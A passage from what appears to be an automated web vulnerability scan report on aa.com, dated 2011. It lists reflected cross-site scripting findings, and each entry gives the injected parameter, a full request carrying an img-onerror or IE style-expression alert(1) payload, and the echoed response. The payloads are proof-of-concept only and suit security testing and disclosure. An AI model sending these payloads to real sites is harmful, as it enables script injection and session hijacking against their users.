<meta http-equiv="Expires" content="0"/>
<meta http-equiv="Pragma" content="n
...[SNIP]...
<input type="hidden" name="bookingPathStateId" value="8713c"><img src=a onerror=alert(1)>1300f2d82ce" />
...[SNIP]...

1.80. https://www.aa.com/login/loginAccess.do [marketId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the marketId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 973c4"><img%20src%3da%20onerror%3dalert(1)>f077b969550 was submitted in the marketId parameter. This input was echoed as 973c4"><img src=a onerror=alert(1)>f077b969550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.do&bookingPathStateId=&marketId=973c4"><img%20src%3da%20onerror%3dalert(1)>f077b969550 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000M1k2EIse_-yYmdAlIjXbsAq:15mbfaj65; Path=/
Content-Length: 106719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="marketId" value="973c4"><img src=a onerror=alert(1)>f077b969550" />
...[SNIP]...

1.81. https://www.aa.com/login/loginAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8f6"><img%20src%3da%20onerror%3dalert(1)>40023d6c144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea8f6"><img src=a onerror=alert(1)>40023d6c144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.do&bookingPathStateId=&marketId=&ea8f6"><img%20src%3da%20onerror%3dalert(1)>40023d6c144=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:44:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000hbEreZAdXRWqs09Te4sg4aS:15mbfaj65; Path=/
Content-Length: 106643


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="ea8f6"><img src=a onerror=alert(1)>40023d6c144" value="1" />
...[SNIP]...

1.82. https://www.aa.com/login/loginAccess.do [previousPage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the previousPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7bb2"><img%20src%3da%20onerror%3dalert(1)>d735257d1cc was submitted in the previousPage parameter. This input was echoed as b7bb2"><img src=a onerror=alert(1)>d735257d1cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.do&previousPage=%2fhomePage.dob7bb2"><img%20src%3da%20onerror%3dalert(1)>d735257d1cc&bookingPathStateId=&marketId= HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:43:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000N_gqpX1KOodvk1lZqRRBCIF:15mbfaj65; Path=/
Content-Length: 106719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="previousPage" value="/homePage.dob7bb2"><img src=a onerror=alert(1)>d735257d1cc" />
...[SNIP]...

1.83. https://www.aa.com/login/loginAccess.do [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /login/loginAccess.do

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a62"><img%20src%3da%20onerror%3dalert(1)>0b6843de265 was submitted in the uri parameter. This input was echoed as f4a62"><img src=a onerror=alert(1)>0b6843de265 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login/loginAccess.do?uri=%2flogin%2floginAccess.dof4a62"><img%20src%3da%20onerror%3dalert(1)>0b6843de265&previousPage=%2fhomePage.do&bookingPathStateId=&marketId= HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Sun, 13 Nov 2011 13:43:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000LqDrEd5Q2yrR5D577FgUYSt:15mbfaj65; Path=/
Content-Length: 106707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<form name="toggleLocaleForm" method="POST" action="/login/loginAccess.dof4a62"><img src=a onerror=alert(1)>0b6843de265">
...[SNIP]...

1.84. https://www.aa.com/reservation/awardFlightSearchAccess.do [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/awardFlightSearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83fe2"><img%20src%3da%20onerror%3dalert(1)>db4cd55bc9d was submitted in the anchorEvent parameter. This input was echoed as 83fe2"><img src=a onerror=alert(1)>db4cd55bc9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/awardFlightSearchAccess.do?anchorEvent=83fe2"><img%20src%3da%20onerror%3dalert(1)>db4cd55bc9d&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181860


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-e
...[SNIP]...
<input type="hidden" name="anchorEvent" value="83fe2"><img src=a onerror=alert(1)>db4cd55bc9d" />
...[SNIP]...

1.85. https://www.aa.com/reservation/awardFlightSearchAccess.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/awardFlightSearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb3c"><img%20src%3da%20onerror%3dalert(1)>7fd1b9d349a was submitted in the from parameter. This input was echoed as eeb3c"><img src=a onerror=alert(1)>7fd1b9d349a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/awardFlightSearchAccess.do?anchorEvent=false&from=Naveeb3c"><img%20src%3da%20onerror%3dalert(1)>7fd1b9d349a HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181865


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-e
...[SNIP]...
<input type="hidden" name="from" value="Naveeb3c"><img src=a onerror=alert(1)>7fd1b9d349a" />
...[SNIP]...

1.86. https://www.aa.com/reservation/awardFlightSearchAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/awardFlightSearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7294"style%3d"x%3aexpression(alert(1))"c79ba24f5ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7294"style="x:expression(alert(1))"c79ba24f5ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/awardFlightSearchAccess.do?d7294"style%3d"x%3aexpression(alert(1))"c79ba24f5ff=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181803


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-e
...[SNIP]...
<input type="hidden" name="d7294"style="x:expression(alert(1))"c79ba24f5ff" value="1" />
...[SNIP]...

1.87. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/flightCheckInViewReservationsAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7265d"><img%20src%3da%20onerror%3dalert(1)>547f75de32f was submitted in the anchorEvent parameter. This input was echoed as 7265d"><img src=a onerror=alert(1)>547f75de32f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/flightCheckInViewReservationsAccess.do?anchorEvent=7265d"><img%20src%3da%20onerror%3dalert(1)>547f75de32f&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118074


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->

...[SNIP]...
<input type="hidden" name="anchorEvent" value="7265d"><img src=a onerror=alert(1)>547f75de32f" />
...[SNIP]...

1.88. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/flightCheckInViewReservationsAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c216e"><img%20src%3da%20onerror%3dalert(1)>cd9ece75500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c216e"><img src=a onerror=alert(1)>cd9ece75500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/flightCheckInViewReservationsAccess.do?c216e"><img%20src%3da%20onerror%3dalert(1)>cd9ece75500=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118016


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->

...[SNIP]...
<input type="hidden" name="c216e"><img src=a onerror=alert(1)>cd9ece75500" value="1" />
...[SNIP]...

1.89. https://www.aa.com/reservation/multiCitySearchAccess.do [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 820bb"><img%20src%3da%20onerror%3dalert(1)>dd1dc3883cb was submitted in the anchorEvent parameter. This input was echoed as 820bb"><img src=a onerror=alert(1)>dd1dc3883cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/multiCitySearchAccess.do?anchorEvent=false820bb"><img%20src%3da%20onerror%3dalert(1)>dd1dc3883cb&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201367


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorEvent" value="false820bb"><img src=a onerror=alert(1)>dd1dc3883cb" />
...[SNIP]...

1.90. https://www.aa.com/reservation/multiCitySearchAccess.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ebd"><img%20src%3da%20onerror%3dalert(1)>55904bffdbc was submitted in the from parameter. This input was echoed as 58ebd"><img src=a onerror=alert(1)>55904bffdbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/multiCitySearchAccess.do?anchorEvent=false&from=58ebd"><img%20src%3da%20onerror%3dalert(1)>55904bffdbc HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201367


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="58ebd"><img src=a onerror=alert(1)>55904bffdbc" />
...[SNIP]...

1.91. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f6cd"%20style%3dx%3aexpression(alert(1))%209010f253203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f6cd" style=x:expression(alert(1)) 9010f253203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/multiCitySearchAccess.do?8f6cd"%20style%3dx%3aexpression(alert(1))%209010f253203=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="8f6cd" style=x:expression(alert(1)) 9010f253203" value="1" />
...[SNIP]...

1.92. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/multiCitySearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51769"><img%20src%3da%20onerror%3dalert(1)>df722ff4cd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51769"><img src=a onerror=alert(1)>df722ff4cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/multiCitySearchAccess.do?anchorEvent=false&from=Nav&51769"><img%20src%3da%20onerror%3dalert(1)>df722ff4cd1=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201460


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="51769"><img src=a onerror=alert(1)>df722ff4cd1" value="1" />
...[SNIP]...

1.93. https://www.aa.com/reservation/oneWaySearchAccess.do [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/oneWaySearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d47"><img%20src%3da%20onerror%3dalert(1)>719355c5b62 was submitted in the anchorEvent parameter. This input was echoed as 94d47"><img src=a onerror=alert(1)>719355c5b62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/oneWaySearchAccess.do?anchorEvent=false94d47"><img%20src%3da%20onerror%3dalert(1)>719355c5b62&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 183261


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="anchorEvent" value="false94d47"><img src=a onerror=alert(1)>719355c5b62" />
...[SNIP]...

1.94. https://www.aa.com/reservation/oneWaySearchAccess.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/oneWaySearchAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2779d"><img%20src%3da%20onerror%3dalert(1)>23e8cd00570 was submitted in the from parameter. This input was echoed as 2779d"><img src=a onerror=alert(1)>23e8cd00570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/oneWaySearchAccess.do?anchorEvent=false&from=Nav2779d"><img%20src%3da%20onerror%3dalert(1)>23e8cd00570 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 183261


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="from" value="Nav2779d"><img src=a onerror=alert(1)>23e8cd00570" />
...[SNIP]...

1.95. https://www.aa.com/reservation/oneWaySearchAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/oneWaySearchAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef3c1"><img%20src%3da%20onerror%3dalert(1)>cb292cd9d2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef3c1"><img src=a onerror=alert(1)>cb292cd9d2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/oneWaySearchAccess.do?anchorEvent=false&from=Nav&ef3c1"><img%20src%3da%20onerror%3dalert(1)>cb292cd9d2a=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 183296


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
   <!-- Meta Tags -->
<meta ht
...[SNIP]...
<input type="hidden" name="ef3c1"><img src=a onerror=alert(1)>cb292cd9d2a" value="1" />
...[SNIP]...

1.96. https://www.aa.com/reservation/reservationsHomeAccess.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/reservationsHomeAccess.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8827"><img%20src%3da%20onerror%3dalert(1)>74594ef5718 was submitted in the from parameter. This input was echoed as e8827"><img src=a onerror=alert(1)>74594ef5718 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /reservation/reservationsHomeAccess.do?from=Nave8827"><img%20src%3da%20onerror%3dalert(1)>74594ef5718 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta
...[SNIP]...
<input type="hidden" name="from" value="Nave8827"><img src=a onerror=alert(1)>74594ef5718" />
...[SNIP]...

1.97. https://www.aa.com/reservation/reservationsHomeAccess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/reservationsHomeAccess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0f2"%20style%3dx%3aexpression(alert(1))%20a9075ebf15a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f0f2" style=x:expression(alert(1)) a9075ebf15a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /reservation/reservationsHomeAccess.do?5f0f2"%20style%3dx%3aexpression(alert(1))%20a9075ebf15a=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:42:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta
...[SNIP]...
<input type="hidden" name="5f0f2" style=x:expression(alert(1)) a9075ebf15a" value="1" />
...[SNIP]...

1.98. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /reservation/roundTripSearchAccess.do

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcddd"><img%20src%3da%20onerror%3dalert(1)>3e7e2603db8 was submitted in the anchorEvent parameter. This input was echoed as fcddd"><img src=a onerror=alert(1)>3e7e2603db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

